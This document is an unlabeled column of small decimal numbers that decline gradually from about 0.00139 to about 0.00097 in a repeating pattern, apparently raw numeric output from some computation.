0.00139143
0.00139088
0.00139088
0.00140391
0.00139088
0.00137333
0.00138637
0.0013858
0.00137334
0.00137334
0.00138636
0.00138636
0.00137334
0.00138637
0.00139099
0.00140178
0.00140385
0.001393
0.00140379
0.00139301
0.00139093
0.00139089
0.0014039
0.00140389
0.00139088
0.00139089
0.0014039
0.00140389
0.00139088
0.00138625
0.00138423
0.00137547
0.0013734
0.00138424
0.00138631
0.00137346
0.00138625
0.00138423
0.00137547
0.0013734
0.00138424
0.00138631
0.00137346
0.00138635
0.00137335
0.00138636
0.00137335
0.00138635
0.00137335
0.00138636
0.00137336
0.00140391
0.00139088
0.00140391
0.00139087
0.0013858
0.00137334
0.00137334
0.00138637
0.00138636
0.00137334
0.00138637
0.00137334
0.00138637
0.00136883
0.0013558
0.00136883
0.0013558
0.00136883
0.00136882
0.00135635
0.00135581
0.00135581
0.00133827
0.0013513
0.00133827
0.0013513
0.00135072
0.00133827
0.00133827
0.00135129
0.00135129
0.00135581
0.00136883
0.00136881
0.00135581
0.00135592
0.00136877
0.0013667
0.00135792
0.00136871
0.00135586
0.00135793
0.00135592
0.00136877
0.0013667
0.00135793
0.00136871
0.00135586
0.00135793
0.00135128
0.00133827
0.00135129
0.00133828
0.00135128
0.00133827
0.00135129
0.00133828
0.00135117
0.00134915
0.00133833
0.00134039
0.00135124
0.00134916
0.00133839
0.00135117
0.00134916
0.00133832
0.0013404
0.00135123
0.00134916
0.00133839
0.00136883
0.00136882
0.00135636
0.0013558
0.0013558
0.00136883
0.0013558
0.00133826
0.00135129
0.00135073
0.00133827
0.00133827
0.00135129
0.00135129
0.00133827
0.00135129
0.00135592
0.00136877
0.0013667
0.00135792
0.00136871
0.00135586
0.00135793
0.00135582
0.00136882
0.00136881
0.00135581
0.00135592
0.0013667
0.00136876
0.00135792
0.00136871
0.00135793
0.00135586
0.00135128
0.00133827
0.00135129
0.00133828
0.00135117
0.00134916
0.00133833
0.0013404
0.00135123
0.00134916
0.00133838
0.00135128
0.00133827
0.00135129
0.00133828
0.00135117
0.00134916
0.0013404
0.00133833
0.00134916
0.00135123
0.00133838
0.00135582
0.00136882
0.00136882
0.00135581
0.00135592
0.0013667
0.00136877
0.00135793
0.00136871
0.00135793
0.00135586
0.00135582
0.00136882
0.00136882
0.00135581
0.00135117
0.00134916
0.00133833
0.0013404
0.00135123
0.00134917
0.00133839
0.00135128
0.00133827
0.00135129
0.00133829
0.00135118
0.00134916
0.0013404
0.00133832
0.00134916
0.00135123
0.00133839
0.00135128
0.00133827
0.00135129
0.00133829
0.00136882
0.00136883
0.00135635
0.00135581
0.00135581
0.00136883
0.0013558
0.00133827
0.0013513
0.00135072
0.00133827
0.00133827
0.00135129
0.00135129
0.00133827
0.0013513
0.00135592
0.00136671
0.00136877
0.00135793
0.00136871
0.00135794
0.00135586
0.00135582
0.00136883
0.00136882
0.00135581
0.00135582
0.00136883
0.00136882
0.00135581
0.00135117
0.00134916
0.0013404
0.00133833
0.00134917
0.00135124
0.00133839
0.00135118
0.00134916
0.0013404
0.00133832
0.00134917
0.00135123
0.00133839
0.00135128
0.00133827
0.00135129
0.00133828
0.00135128
0.00133827
0.00135129
0.00133828
0.00136883
0.0013558
0.00136883
0.0013558
0.00135073
0.00133827
0.00133827
0.00135129
0.00135129
0.00133826
0.00135129
0.00133827
0.00135129
0.00133376
0.00132073
0.00133376
0.00132073
0.00133376
0.00133376
0.00132128
0.00132073
0.00132073
0.00130319
0.00131622
0.00130319
0.00131622
0.00131565
0.00130319
0.00130319
0.00131621
0.00131622
0.00132074
0.00133375
0.00133375
0.00132073
0.00132084
0.0013337
0.00133163
0.00132285
0.00133364
0.00132079
0.00132286
0.00132084
0.00133369
0.00133163
0.00132285
0.00133364
0.00132078
0.00132286
0.0013162
0.00130319
0.00131621
0.0013032
0.0013162
0.00130319
0.00131621
0.0013032
0.0013161
0.00131408
0.00130325
0.00130532
0.00131616
0.00131409
0.00130331
0.0013161
0.00131408
0.00130324
0.00130531
0.00131616
0.00131408
0.00130331
0.00133375
0.00133376
0.00132128
0.00132073
0.00132073
0.00133376
0.00132073
0.00130319
0.00131622
0.00131565
0.00130319
0.00130319
0.00131621
0.00131622
0.00130319
0.00131622
0.00132084
0.0013337
0.00133163
0.00132285
0.00133364
0.00132079
0.00132286
0.00132074
0.00133375
0.00133374
0.00132073
0.00132084
0.00133163
0.0013337
0.00132286
0.00133364
0.00132286
0.00132079
0.00131621
0.00130319
0.00131622
0.0013032
0.0013161
0.00131408
0.00130324
0.00130532
0.00131616
0.00131409
0.00130331
0.00131621
0.00130319
0.00131621
0.0013032
0.0013161
0.00131409
0.00130532
0.00130325
0.00131409
0.00131616
0.00130331
0.00132074
0.00133376
0.00133375
0.00132073
0.00132084
0.00133163
0.00133369
0.00132286
0.00133364
0.00132286
0.00132078
0.00132074
0.00133375
0.00133375
0.00132073
0.0013161
0.00131408
0.00130325
0.00130532
0.00131616
0.00131409
0.00130331
0.0013162
0.00130319
0.00131621
0.0013032
0.0013161
0.00131409
0.00130532
0.00130324
0.00131409
0.00131616
0.00130331
0.0013162
0.00130319
0.00131621
0.0013032
0.00133376
0.00133376
0.00132128
0.00132073
0.00132073
0.00133376
0.00132073
0.00130319
0.00131622
0.00131565
0.00130319
0.0013032
0.00131621
0.00131622
0.00130319
0.00131622
0.00132085
0.00133163
0.0013337
0.00132285
0.00133364
0.00132286
0.00132079
0.00132074
0.00133376
0.00133375
0.00132073
0.00132074
0.00133375
0.00133374
0.00132073
0.0013161
0.00131408
0.00130532
0.00130325
0.00131409
0.00131616
0.00130331
0.00131611
0.00131408
0.00130531
0.00130325
0.00131408
0.00131616
0.00130331
0.00131621
0.0013032
0.00131622
0.00130321
0.00131621
0.0013032
0.00131622
0.00130321
0.00133376
0.00132073
0.00133376
0.00132073
0.00131565
0.00130319
0.0013032
0.00131622
0.00131622
0.00130319
0.00131622
0.00130319
0.00131622
0.00129868
0.00128564
0.00129868
0.00128564
0.00129867
0.00129867
0.0012862
0.00128565
0.00128564
0.0012681
0.00128113
0.0012681
0.00128113
0.00128057
0.0012681
0.0012681
0.00128113
0.00128113
0.00128566
0.00129867
0.00129866
0.00128565
0.00128576
0.00129862
0.00129655
0.00128777
0.00129856
0.0012857
0.00128778
0.00128576
0.00129862
0.00129655
0.00128777
0.00129856
0.0012857
0.00128778
0.00128112
0.0012681
0.00128113
0.00126812
0.00128112
0.0012681
0.00128113
0.00126811
0.00128101
0.001279
0.00126815
0.00127023
0.00128107
0.001279
0.00126822
0.00128101
0.001279
0.00126816
0.00127023
0.00128107
0.001279
0.00126822
0.00129867
0.00129867
0.0012862
0.00128564
0.00128565
0.00129868
0.00128564
0.0012681
0.00128113
0.00128057
0.0012681
0.00126811
0.00128113
0.00128113
0.0012681
0.00128114
0.00128576
0.00129862
0.00129655
0.00128777
0.00129856
0.0012857
0.00128778
0.00128566
0.00129867
0.00129866
0.00128565
0.00128576
0.00129655
0.00129862
0.00128777
0.00129856
0.00128778
0.0012857
0.00128112
0.0012681
0.00128113
0.00126812
0.00128102
0.001279
0.00126816
0.00127023
0.00128107
0.001279
0.00126822
0.00128112
0.00126811
0.00128113
0.00126812
0.00128102
0.001279
0.00127023
0.00126816
0.001279
0.00128108
0.00126822
0.00128566
0.00129867
0.00129866
0.00128565
0.00128576
0.00129655
0.00129862
0.00128777
0.00129856
0.00128777
0.0012857
0.00128566
0.00129867
0.00129866
0.00128565
0.00128102
0.001279
0.00126816
0.00127023
0.00128108
0.001279
0.00126822
0.00128112
0.00126811
0.00128113
0.00126811
0.00128101
0.001279
0.00127023
0.00126816
0.001279
0.00128107
0.00126822
0.00128112
0.0012681
0.00128113
0.00126811
0.00129868
0.00129868
0.0012862
0.00128565
0.00128564
0.00129868
0.00128564
0.0012681
0.00128114
0.00128057
0.00126811
0.0012681
0.00128113
0.00128113
0.0012681
0.00128113
0.00128576
0.00129655
0.00129862
0.00128777
0.00129856
0.00128777
0.0012857
0.00128566
0.00129868
0.00129867
0.00128565
0.00128566
0.00129868
0.00129867
0.00128565
0.00128101
0.001279
0.00127023
0.00126816
0.001279
0.00128107
0.00126822
0.00128101
0.001279
0.00127023
0.00126816
0.001279
0.00128107
0.00126822
0.00128112
0.00126811
0.00128113
0.00126812
0.00128112
0.00126811
0.00128113
0.00126812
0.00129868
0.00128564
0.00129868
0.00128564
0.00128057
0.00126811
0.00126811
0.00128113
0.00128113
0.0012681
0.00128113
0.0012681
0.00128113
0.00126359
0.00125055
0.00126359
0.00125055
0.00126358
0.00126359
0.00125111
0.00125056
0.00125056
0.00123301
0.00124604
0.00123301
0.00124605
0.00124548
0.00123302
0.00123301
0.00124604
0.00124604
0.00125057
0.00126358
0.00126357
0.00125056
0.00125067
0.00126353
0.00126146
0.00125268
0.00126347
0.00125061
0.00125268
0.00125067
0.00126353
0.00126146
0.00125268
0.00126347
0.00125061
0.00125269
0.00124603
0.00123302
0.00124604
0.00123302
0.00124603
0.00123301
0.00124604
0.00123302
0.00124592
0.00124391
0.00123307
0.00123514
0.00124598
0.00124391
0.00123313
0.00124592
0.0012439
0.00123307
0.00123514
0.00124598
0.00124391
0.00123313
0.00126359
0.00126359
0.00125111
0.00125056
0.00125056
0.00126359
0.00125056
0.00123301
0.00124604
0.00124547
0.00123301
0.00123301
0.00124604
0.00124604
0.00123301
0.00124605
0.00125067
0.00126353
0.00126146
0.00125268
0.00126347
0.00125061
0.00125269
0.00125057
0.00126359
0.00126358
0.00125056
0.00125067
0.00126146
0.00126353
0.00125268
0.00126347
0.00125269
0.00125061
0.00124603
0.00123301
0.00124604
0.00123302
0.00124592
0.00124391
0.00123307
0.00123514
0.00124599
0.00124391
0.00123313
0.00124603
0.00123301
0.00124604
0.00123303
0.00124592
0.00124391
0.00123514
0.00123307
0.00124391
0.00124598
0.00123313
0.00125057
0.00126359
0.00126357
0.00125056
0.00125067
0.00126146
0.00126353
0.00125268
0.00126347
0.00125268
0.00125061
0.00125056
0.00126358
0.00126357
0.00125056
0.00124592
0.0012439
0.00123307
0.00123514
0.00124598
0.00124391
0.00123313
0.00124603
0.00123301
0.00124604
0.00123302
0.00124592
0.00124391
0.00123514
0.00123306
0.00124391
0.00124598
0.00123313
0.00124603
0.00123301
0.00124604
0.00123302
0.00126359
0.00126359
0.00125111
0.00125056
0.00125056
0.00126359
0.00125055
0.00123301
0.00124604
0.00124548
0.00123301
0.00123301
0.00124604
0.00124604
0.00123301
0.00124604
0.00125066
0.00126146
0.00126353
0.00125268
0.00126347
0.00125269
0.00125061
0.00125056
0.00126358
0.00126358
0.00125056
0.00125057
0.00126359
0.00126358
0.00125056
0.00124592
0.00124391
0.00123514
0.00123306
0.00124391
0.00124598
0.00123313
0.00124592
0.00124391
0.00123514
0.00123306
0.00124391
0.00124598
0.00123312
0.00124602
0.00123301
0.00124604
0.00123302
0.00124603
0.00123301
0.00124604
0.00123302
0.00126359
0.00125055
0.00126359
0.00125055
0.00124547
0.00123301
0.00123301
0.00124604
0.00124604
0.00123301
0.00124604
0.001233
0.00124604
0.0012285
0.00121546
0.0012285
0.00121546
0.0012285
0.0012285
0.00121601
0.00121546
0.00121547
0.00119791
0.00121095
0.00119791
0.00121095
0.00121038
0.00119791
0.00119791
0.00121095
0.00121095
0.00121547
0.00122849
0.00122848
0.00121546
0.00121558
0.00122844
0.00122636
0.00121758
0.00122838
0.00121552
0.00121759
0.00121557
0.00122844
0.00122636
0.00121758
0.00122838
0.00121552
0.00121759
0.00121093
0.00119791
0.00121095
0.00119793
0.00121093
0.00119791
0.00121094
0.00119792
0.00121083
0.00120881
0.00119797
0.00120004
0.00121089
0.00120882
0.00119803
0.00121083
0.00120881
0.00119796
0.00120004
0.00121089
0.00120881
0.00119803
0.00122849
0.00122849
0.00121601
0.00121546
0.00121546
0.0012285
0.00121546
0.00119791
0.00121095
0.00121037
0.00119791
0.00119791
0.00121094
0.00121094
0.00119791
0.00121095
0.00121558
0.00122844
0.00122637
0.00121759
0.00122838
0.00121552
0.00121759
0.00121547
0.00122849
0.00122848
0.00121546
0.00121558
0.00122637
0.00122844
0.00121758
0.00122838
0.00121759
0.00121552
0.00121094
0.00119792
0.00121095
0.00119792
0.00121083
0.00120881
0.00119797
0.00120004
0.00121089
0.00120881
0.00119803
0.00121093
0.00119792
0.00121094
0.00119793
0.00121083
0.00120881
0.00120004
0.00119797
0.00120882
0.00121089
0.00119803
0.00121547
0.00122849
0.00122848
0.00121546
0.00121557
0.00122636
0.00122844
0.00121758
0.00122838
0.00121759
0.00121552
0.00121547
0.00122849
0.00122848
0.00121546
0.00121082
0.00120881
0.00119797
0.00120004
0.00121089
0.00120882
0.00119803
0.00121093
0.00119791
0.00121094
0.00119792
0.00121082
0.00120881
0.00120004
0.00119797
0.00120881
0.00121089
0.00119803
0.00121093
0.00119791
0.00121094
0.00119793
0.00122849
0.00122849
0.00121602
0.00121546
0.00121546
0.0012285
0.00121546
0.00119791
0.00121095
0.00121038
0.00119791
0.00119792
0.00121094
0.00121094
0.00119791
0.00121095
0.00121557
0.00122636
0.00122843
0.00121758
0.00122837
0.00121759
0.00121551
0.00121547
0.00122849
0.00122848
0.00121546
0.00121547
0.00122849
0.00122848
0.00121546
0.00121082
0.00120881
0.00120004
0.00119797
0.00120882
0.00121089
0.00119803
0.00121083
0.00120881
0.00120004
0.00119797
0.00120882
0.00121089
0.00119803
0.00121093
0.00119792
0.00121094
0.00119792
0.00121093
0.00119792
0.00121094
0.00119792
0.0012285
0.00121546
0.00122849
0.00121546
0.00121038
0.00119791
0.00119791
0.00121094
0.00121094
0.00119791
0.00121095
0.00119791
0.00121095
0.0011934
0.00118036
0.0011934
0.00118036
0.00119339
0.0011934
0.00118092
0.00118036
0.00118036
0.0011628
0.00117585
0.00116281
0.00117585
0.00117528
0.00116281
0.00116281
0.00117584
0.00117585
0.00118037
0.00119339
0.00119338
0.00118036
0.00118047
0.00119334
0.00119126
0.00118248
0.00119328
0.00118042
0.00118249
0.00118047
0.00119334
0.00119126
0.00118248
0.00119328
0.00118042
0.00118249
0.00117583
0.00116281
0.00117584
0.00116282
0.00117583
0.00116281
0.00117584
0.00116282
0.00117572
0.00117371
0.00116286
0.00116494
0.00117579
0.00117371
0.00116292
0.00117572
0.0011737
0.00116286
0.00116493
0.00117579
0.00117371
0.00116292
0.00119339
0.00119339
0.00118091
0.00118036
0.00118036
0.00119339
0.00118036
0.0011628
0.00117585
0.00117527
0.00116281
0.00116281
0.00117585
0.00117584
0.00116281
0.00117585
0.00118047
0.00119334
0.00119127
0.00118248
0.00119328
0.00118042
0.00118249
0.00118037
0.0011934
0.00119339
0.00118037
0.00118047
0.00119127
0.00119334
0.00118249
0.00119328
0.00118249
0.00118042
0.00117583
0.00116281
0.00117584
0.00116282
0.00117573
0.00117371
0.00116286
0.00116493
0.00117579
0.00117371
0.00116293
0.00117583
0.00116281
0.00117584
0.00116282
0.00117573
0.00117371
0.00116494
0.00116287
0.00117371
0.00117579
0.00116293
0.00118037
0.00119339
0.00119339
0.00118036
0.00118047
0.00119126
0.00119334
0.00118249
0.00119328
0.00118249
0.00118042
0.00118037
0.00119339
0.00119339
0.00118036
0.00117573
0.0011737
0.00116286
0.00116494
0.00117578
0.00117371
0.00116293
0.00117583
0.00116281
0.00117584
0.00116282
0.00117573
0.00117371
0.00116494
0.00116286
0.00117372
0.00117579
0.00116293
0.00117583
0.00116281
0.00117584
0.00116282
0.0011934
0.0011934
0.00118091
0.00118036
0.00118037
0.0011934
0.00118036
0.00116281
0.00117585
0.00117528
0.00116281
0.00116281
0.00117585
0.00117585
0.00116281
0.00117585
0.00118047
0.00119127
0.00119334
0.00118249
0.00119328
0.00118249
0.00118042
0.00118037
0.0011934
0.00119338
0.00118037
0.00118037
0.0011934
0.00119338
0.00118037
0.00117573
0.00117371
0.00116493
0.00116287
0.00117371
0.0011758
0.00116293
0.00117573
0.00117371
0.00116494
0.00116287
0.00117372
0.00117579
0.00116293
0.00117583
0.00116281
0.00117585
0.00116283
0.00117583
0.00116282
0.00117585
0.00116283
0.0011934
0.00118036
0.0011934
0.00118036
0.00117528
0.00116281
0.00116281
0.00117584
0.00117585
0.00116281
0.00117585
0.00116281
0.00117585
0.00115829
0.00114525
0.00115829
0.00114525
0.00115829
0.00115829
0.0011458
0.00114525
0.00114525
0.00112769
0.00114074
0.00112769
0.00114074
0.00114017
0.0011277
0.0011277
0.00114074
0.00114074
0.00114526
0.00115829
0.00115828
0.00114526
0.00114537
0.00115823
0.00115616
0.00114738
0.00115817
0.00114531
0.00114738
0.00114536
0.00115823
0.00115616
0.00114738
0.00115817
0.00114531
0.00114738
0.00114072
0.0011277
0.00114073
0.00112771
0.00114072
0.0011277
0.00114073
0.00112771
0.00114062
0.0011386
0.00112775
0.00112983
0.00114068
0.0011386
0.00112781
0.00114062
0.0011386
0.00112775
0.00112983
0.00114068
0.0011386
0.00112781
0.00115829
0.00115829
0.00114581
0.00114526
0.00114525
0.00115829
0.00114525
0.0011277
0.00114074
0.00114017
0.0011277
0.0011277
0.00114074
0.00114074
0.00112769
0.00114074
0.00114537
0.00115823
0.00115616
0.00114737
0.00115817
0.00114531
0.00114738
0.00114527
0.00115829
0.00115828
0.00114526
0.00114537
0.00115616
0.00115824
0.00114738
0.00115818
0.00114738
0.00114532
0.00114073
0.0011277
0.00114073
0.00112771
0.00114062
0.0011386
0.00112775
0.00112982
0.00114068
0.0011386
0.00112781
0.00114073
0.0011277
0.00114074
0.00112771
0.00114062
0.0011386
0.00112982
0.00112775
0.0011386
0.00114068
0.00112781
0.00114526
0.00115829
0.00115828
0.00114526
0.00114537
0.00115616
0.00115823
0.00114738
0.00115818
0.00114738
0.00114531
0.00114526
0.00115829
0.00115828
0.00114526
0.00114061
0.0011386
0.00112775
0.00112983
0.00114068
0.0011386
0.00112782
0.00114072
0.0011277
0.00114074
0.00112771
0.00114062
0.0011386
0.00112983
0.00112775
0.0011386
0.00114068
0.00112781
0.00114072
0.0011277
0.00114073
0.00112771
0.00115829
0.00115829
0.00114581
0.00114526
0.00114526
0.0011583
0.00114525
0.0011277
0.00114074
0.00114017
0.0011277
0.0011277
0.00114074
0.00114074
0.0011277
0.00114074
0.00114537
0.00115616
0.00115824
0.00114737
0.00115818
0.00114738
0.00114531
0.00114527
0.00115829
0.00115829
0.00114526
0.00114526
0.00115829
0.00115829
0.00114526
0.00114062
0.0011386
0.00112982
0.00112776
0.0011386
0.00114068
0.00112782
0.00114062
0.0011386
0.00112983
0.00112775
0.0011386
0.00114068
0.00112782
0.00114072
0.0011277
0.00114074
0.00112771
0.00114072
0.0011277
0.00114073
0.00112771
0.0011583
0.00114525
0.0011583
0.00114525
0.00114017
0.0011277
0.0011277
0.00114073
0.00114074
0.00112769
0.00114074
0.00112769
0.00114074
0.00112318
0.00111014
0.00112318
0.00111014
0.00112318
0.00112318
0.00111069
0.00111014
0.00111014
0.00109258
0.00110562
0.00109258
0.00110562
0.00110505
0.00109258
0.00109258
0.00110562
0.00110562
0.00111015
0.00112318
0.00112317
0.00111014
0.00111025
0.00112312
0.00112105
0.00111226
0.00112306
0.0011102
0.00111227
0.00111025
0.00112312
0.00112105
0.00111226
0.00112306
0.0011102
0.00111227
0.00110561
0.00109259
0.00110562
0.0010926
0.00110561
0.00109259
0.00110562
0.0010926
0.0011055
0.00110349
0.00109264
0.00109471
0.00110556
0.00110349
0.0010927
0.0011055
0.00110348
0.00109264
0.00109471
0.00110557
0.00110349
0.0010927
0.00112318
0.00112318
0.0011107
0.00111014
0.00111014
0.00112318
0.00111014
0.00109258
0.00110563
0.00110506
0.00109259
0.00109258
0.00110562
0.00110562
0.00109258
0.00110563
0.00111025
0.00112312
0.00112105
0.00111227
0.00112306
0.00111019
0.00111227
0.00111015
0.00112317
0.00112317
0.00111014
0.00111025
0.00112105
0.00112312
0.00111226
0.00112306
0.00111227
0.00111019
0.00110561
0.00109258
0.00110562
0.00109259
0.0011055
0.00110349
0.00109264
0.00109471
0.00110556
0.00110349
0.0010927
0.00110561
0.00109258
0.00110561
0.00109259
0.00110551
0.00110348
0.00109471
0.00109263
0.00110349
0.00110556
0.0010927
0.00111015
0.00112318
0.00112317
0.00111014
0.00111025
0.00112105
0.00112312
0.00111226
0.00112306
0.00111227
0.00111019
0.00111015
0.00112318
0.00112317
0.00111014
0.0011055
0.00110348
0.00109264
0.00109471
0.00110556
0.00110349
0.0010927
0.00110561
0.00109259
0.00110562
0.00109259
0.0011055
0.00110348
0.00109471
0.00109264
0.00110349
0.00110556
0.0010927
0.00110561
0.00109258
0.00110562
0.00109259
0.00112318
0.00112318
0.00111069
0.00111014
0.00111014
0.00112318
0.00111013
0.00109257
0.00110562
0.00110505
0.00109258
0.00109258
0.00110562
0.00110562
0.00109257
0.00110562
0.00111025
0.00112105
0.00112312
0.00111226
0.00112306
0.00111227
0.00111019
0.00111015
0.00112318
0.00112316
0.00111014
0.00111015
0.00112318
0.00112317
0.00111014
0.0011055
0.00110349
0.00109471
0.00109263
0.00110349
0.00110556
0.0010927
0.0011055
0.00110348
0.00109471
0.00109264
0.00110349
0.00110556
0.0010927
0.00110561
0.00109258
0.00110561
0.00109259
0.00110561
0.00109259
0.00110562
0.00109259
0.00112318
0.00111013
0.00112318
0.00111014
0.00110506
0.00109258
0.00109259
0.00110562
0.00110562
0.00109258
0.00110562
0.00109258
0.00110562
0.00108807
0.00107502
0.00108807
0.00107502
0.00108807
0.00108806
0.00107558
0.00107502
0.00107502
0.00105746
0.00107051
0.00105746
0.00107051
0.00106994
0.00105746
0.00105746
0.0010705
0.0010705
0.00107504
0.00108806
0.00108805
0.00107503
0.00107514
0.00108801
0.00108593
0.00107715
0.00108795
0.00107508
0.00107715
0.00107514
0.00108801
0.00108593
0.00107715
0.00108795
0.00107508
0.00107715
0.0010705
0.00105747
0.0010705
0.00105748
0.0010705
0.00105747
0.0010705
0.00105748
0.00107039
0.00106837
0.00105752
0.0010596
0.00107045
0.00106838
0.00105759
0.00107039
0.00106837
0.00105752
0.0010596
0.00107045
0.00106838
0.00105758
0.00108806
0.00108806
0.00107558
0.00107503
0.00107502
0.00108807
0.00107502
0.00105747
0.00107051
0.00106994
0.00105747
0.00105747
0.00107051
0.0010705
0.00105746
0.00107051
0.00107514
0.00108801
0.00108593
0.00107715
0.00108794
0.00107508
0.00107715
0.00107503
0.00108806
0.00108805
0.00107502
0.00107513
0.00108593
0.001088
0.00107714
0.00108794
0.00107715
0.00107508
0.00107049
0.00105747
0.0010705
0.00105748
0.00107038
0.00106837
0.00105752
0.00105959
0.00107045
0.00106837
0.00105758
0.00107049
0.00105747
0.0010705
0.00105748
0.00107038
0.00106837
0.00105959
0.00105752
0.00106837
0.00107044
0.00105758
0.00107503
0.00108806
0.00108805
0.00107502
0.00107513
0.00108593
0.00108801
0.00107714
0.00108795
0.00107715
0.00107508
0.00107503
0.00108806
0.00108805
0.00107502
0.00107038
0.00106837
0.00105752
0.00105959
0.00107045
0.00106837
0.00105759
0.00107049
0.00105747
0.0010705
0.00105748
0.00107038
0.00106837
0.00105959
0.00105752
0.00106837
0.00107044
0.00105758
0.00107049
0.00105747
0.0010705
0.00105747
0.00108806
0.00108806
0.00107557
0.00107502
0.00107502
0.00108806
0.00107502
0.00105746
0.0010705
0.00106993
0.00105746
0.00105746
0.0010705
0.0010705
0.00105746
0.0010705
0.00107513
0.00108593
0.001088
0.00107714
0.00108794
0.00107715
0.00107507
0.00107503
0.00108806
0.00108805
0.00107502
0.00107503
0.00108806
0.00108805
0.00107502
0.00107038
0.00106837
0.00105959
0.00105752
0.00106837
0.00107044
0.00105758
0.00107038
0.00106836
0.00105959
0.00105752
0.00106837
0.00107044
0.00105758
0.00107049
0.00105746
0.0010705
0.00105748
0.00107049
0.00105746
0.0010705
0.00105748
0.00108806
0.00107502
0.00108807
0.00107502
0.00106994
0.00105746
0.00105746
0.0010705
0.0010705
0.00105746
0.0010705
0.00105746
0.0010705
0.00105295
0.00103991
0.00105295
0.0010399
0.00105295
0.00105294
0.00104046
0.00103991
0.00103991
0.00102235
0.00103539
0.00102234
0.00103539
0.00103482
0.00102235
0.00102235
0.00103539
0.00103539
0.00103992
0.00105295
0.00105294
0.00103991
0.00104002
0.00105289
0.00105082
0.00104203
0.00105283
0.00103996
0.00104203
0.00104002
0.00105289
0.00105082
0.00104203
0.00105283
0.00103996
0.00104203
0.00103538
0.00102235
0.00103539
0.00102236
0.00103537
0.00102235
0.00103539
0.00102236
0.00103528
0.00103325
0.00102241
0.00102447
0.00103533
0.00103325
0.00102247
0.00103528
0.00103325
0.0010224
0.00102447
0.00103533
0.00103325
0.00102247
0.00105295
0.00105294
0.00104046
0.00103991
0.0010399
0.00105295
0.0010399
0.00102235
0.00103539
0.00103482
0.00102235
0.00102235
0.00103539
0.00103538
0.00102234
0.00103538
0.00104002
0.00105289
0.00105081
0.00104203
0.00105283
0.00103996
0.00104203
0.00103992
0.00105294
0.00105293
0.00103991
0.00104002
0.00105081
0.00105289
0.00104202
0.00105283
0.00104203
0.00103996
0.00103538
0.00102235
0.00103538
0.00102236
0.00103527
0.00103325
0.0010224
0.00102447
0.00103533
0.00103325
0.00102246
0.00103538
0.00102235
0.00103538
0.00102235
0.00103527
0.00103324
0.00102447
0.0010224
0.00103325
0.00103533
0.00102246
0.00103991
0.00105294
0.00105293
0.0010399
0.00104001
0.00105081
0.00105289
0.00104202
0.00105283
0.00104203
0.00103996
0.00103992
0.00105294
0.00105293
0.0010399
0.00103526
0.00103325
0.0010224
0.00102448
0.00103533
0.00103325
0.00102246
0.00103537
0.00102235
0.00103538
0.00102236
0.00103527
0.00103325
0.00102447
0.0010224
0.00103325
0.00103533
0.00102246
0.00103537
0.00102235
0.00103538
0.00102236
0.00105294
0.00105294
0.00104045
0.00103991
0.0010399
0.00105294
0.0010399
0.00102234
0.00103539
0.00103482
0.00102234
0.00102234
0.00103539
0.00103538
0.00102234
0.00103539
0.00104001
0.00105081
0.00105289
0.00104202
0.00105283
0.00104203
0.00103996
0.00103991
0.00105294
0.00105293
0.0010399
0.00103991
0.00105294
0.00105293
0.0010399
0.00103526
0.00103325
0.00102447
0.0010224
0.00103325
0.00103532
0.00102246
0.00103526
0.00103325
0.00102447
0.0010224
0.00103325
0.00103533
0.00102246
0.00103537
0.00102234
0.00103538
0.00102235
0.00103537
0.00102234
0.00103538
0.00102235
0.00105295
0.0010399
0.00105294
0.0010399
0.00103482
0.00102234
0.00102234
0.00103538
0.00103538
0.00102234
0.00103539
0.00102234
0.00103538
0.00101783
0.00100478
0.00101783
0.00100478
0.00101783
0.00101782
0.00100534
0.00100479
0.00100478
0.000987217
0.00100027
0.000987216
0.00100026
0.000999699
0.000987221
0.000987219
0.00100026
0.00100026
0.0010048
0.00101783
0.00101782
0.00100479
0.0010049
0.00101777
0.00101569
0.00100691
0.00101771
0.00100484
0.00100692
0.0010049
0.00101777
0.0010157
0.00100691
0.00101771
0.00100484
0.00100692
0.00100026
0.000987222
0.00100026
0.000987232
0.00100026
0.00098722
0.00100026
0.000987231
0.00100015
0.000998127
0.000987276
0.000989351
0.00100021
0.000998133
0.000987337
0.00100015
0.000998128
0.000987275
0.000989354
0.00100021
0.000998135
0.000987337
0.00101783
0.00101782
0.00100534
0.00100479
0.00100479
0.00101783
0.00100478
0.000987215
0.00100027
0.000999698
0.000987219
0.000987222
0.00100027
0.00100026
0.000987217
0.00100026
0.00100489
0.00101777
0.00101569
0.00100691
0.00101771
0.00100484
0.00100691
0.00100479
0.00101782
0.00101781
0.00100478
0.00100489
0.00101569
0.00101776
0.0010069
0.00101771
0.00100691
0.00100483
0.00100025
0.00098722
0.00100026
0.000987228
0.00100014
0.000998127
0.000987275
0.000989349
0.0010002
0.000998131
0.000987337
0.00100025
0.000987219
0.00100026
0.000987226
0.00100014
0.000998123
0.000989351
0.000987272
0.000998132
0.0010002
0.000987336
0.00100479
0.00101782
0.00101781
0.00100478
0.0010049
0.00101569
0.00101777
0.0010069
0.00101771
0.00100691
0.00100484
0.00100479
0.00101782
0.00101781
0.00100478
0.00100014
0.000998128
0.000987277
0.000989349
0.00100021
0.000998131
0.000987339
0.00100025
0.000987223
0.00100026
0.000987232
0.00100015
0.000998123
0.000989345
0.000987276
0.000998129
0.0010002
0.000987337
0.00100024
0.000987222
0.00100026
0.000987234
0.00101782
0.00101782
0.00100533
0.00100478
0.00100478
0.00101783
0.00100478
0.000987214
0.00100026
0.000999693
0.000987219
0.000987221
0.00100026
0.00100026
0.000987216
0.00100026
0.00100489
0.00101569
0.00101776
0.0010069
0.00101771
0.00100691
0.00100483
0.00100479
0.00101782
0.00101781
0.00100478
0.00100479
0.00101782
0.00101781
0.00100478
0.00100014
0.000998122
0.000989348
0.000987276
0.000998128
0.0010002
0.000987338
0.00100014
0.000998124
0.000989348
0.000987272
0.000998128
0.0010002
0.000987335
0.00100025
0.000987222
0.00100026
0.000987227
0.00100025
0.000987219
0.00100026
0.000987228
0.00101783
0.00100478
0.00101782
0.00100478
0.000999696
0.00098722
0.00098722
0.00100026
0.00100026
0.000987216
0.00100026
0.000987214
0.00100026
0.000982703
0.000969653
0.000982702
0.000969653
0.000982701
0.000982698
0.000970208
0.000969659
0.000969656
0.000952085
0.000965138
0.000952087
0.00096514
0.000964568
0.000952087
0.000952091
0.000965137
0.000965136
0.000969665
0.000982694
0.000982687
0.000969656
0.000969767
0.000982644
0.00098057
0.000971781
0.000982584
0.000969713
0.000971787
0.000969768
0.000982641
0.000980572
0.000971781
0.000982584
0.000969709
0.000971788
0.000965125
0.000952091
0.000965134
0.000952099
0.000965122
0.000952091
0.00096513
0.000952102
0.000965016
0.000962997
0.000952144
0.00095422
0.000965081
0.000963003
0.000952206
0.000965017
